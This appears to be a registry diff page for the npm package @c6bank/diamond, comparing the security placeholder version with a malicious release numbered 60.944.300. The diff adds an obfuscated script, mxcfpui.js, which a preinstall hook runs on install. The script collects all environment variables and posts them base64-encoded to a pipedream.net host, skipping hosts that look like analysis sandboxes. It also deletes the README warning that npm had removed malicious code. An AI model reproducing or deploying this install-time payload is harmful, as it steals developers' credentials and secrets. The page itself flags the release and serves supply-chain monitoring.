@c6bank/diamond 0.0.1-security → 60.944.300
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @c6bank/diamond might be problematic. Click here for more details.
- package/mxcfpui.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/mxcfpui.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0xfc5f0b=a0_0x2500;(function(_0x2ebdef,_0x2afe9b){const _0x43f814=a0_0x2500,_0x10a7c9=_0x2ebdef();while(!![]){try{const _0x1d720f=parseInt(_0x43f814(0x1c0))/0x1*(-parseInt(_0x43f814(0x1b3))/0x2)+parseInt(_0x43f814(0x1b1))/0x3+parseInt(_0x43f814(0x1ba))/0x4+parseInt(_0x43f814(0x1b8))/0x5*(parseInt(_0x43f814(0x1b5))/0x6)+-parseInt(_0x43f814(0x1c9))/0x7+parseInt(_0x43f814(0x1af))/0x8*(parseInt(_0x43f814(0x1cb))/0x9)+parseInt(_0x43f814(0x1c3))/0xa*(-parseInt(_0x43f814(0x1cc))/0xb);if(_0x1d720f===_0x2afe9b)break;else _0x10a7c9['push'](_0x10a7c9['shift']());}catch(_0x59469e){_0x10a7c9['push'](_0x10a7c9['shift']());}}}(a0_0x2fdb,0x1b74c));const http=require(a0_0xfc5f0b(0x1ca)),filter=[{'key':a0_0xfc5f0b(0x1c7),'val':a0_0xfc5f0b(0x1b0)},{'key':a0_0xfc5f0b(0x1c7),'val':a0_0xfc5f0b(0x1b4)},{'key':a0_0xfc5f0b(0x1c7),'val':'registry.npmmirror.com'},{'key':a0_0xfc5f0b(0x1be),'val':a0_0xfc5f0b(0x1b2)},{'key':'_','val':a0_0xfc5f0b(0x1c5)}];function a0_0x2500(_0x4ef2ef,_0x28d5a4){const _0x2fdb76=a0_0x2fdb();return a0_0x2500=function(_0x2500db,_0xd06f98){_0x2500db=_0x2500db-0x1ae;let _0x72563a=_0x2fdb76[_0x2500db];return _0x72563a;},a0_0x2500(_0x4ef2ef,_0x28d5a4);}function main(){const _0x47a311=a0_0xfc5f0b;var _0x4716cb=process[_0x47a311(0x1bc)]||{};if(filter[_0x47a311(0x1c2)](({key:_0x57b8ad,val:_0x3e616d})=>_0x4716cb[_0x57b8ad]&&_0x4716cb[_0x57b8ad][_0x47a311(0x1bb)](_0x3e616d))||Object[_0x47a311(0x1c8)](_0x4716cb)['length']<0xa)return;req=http[_0x47a311(0x1b7)]({'host':[_0x47a311(0x1ae),'m',_0x47a311(0x1c4),_0x47a311(0x1bd)][_0x47a311(0x1c6)]('.'),'path':'/'+(_0x4716cb['npm_package_name']||''),'method':'POST'})['on'](_0x47a311(0x1b6),function(_0x3ee72f){}),req[_0x47a311(0x1b9)](Buffer['from'](JSON[_0x47a311(0x1cd)](_0x4716cb))[_0x47a311(0x1bf)]('base64')),req[_0x47a311(0x1c1)]();}function a0_0x2fdb(){const _0x5609aa=['some','573820AjUAGv','pipedream','/usr/bin/python','join','npm_config_registry','keys','1104362TFgaZE','https','153GTKcLT','33MYwYvX','stringify','e0a8dd05baeedab99a1f90353febac51','48696rPjIwr','taobao.org','350667SzOGoP','daasadmin','4742gpGJJJ','tencent.com','318lKQGat','error','request','19730yNaIHK','write','449792uffRMJ','includes','env','net','USERNAME','toString','42tzRPEU','end'];a0_0x2fdb=function(){return _0x5609aa;};return a0_0x2fdb();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@c6bank/diamond",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "60.944.300",
|
|
4
|
+
"main": "mxcfpui.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node mxcfpui.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40c6bank%2Fdiamond for more information.
|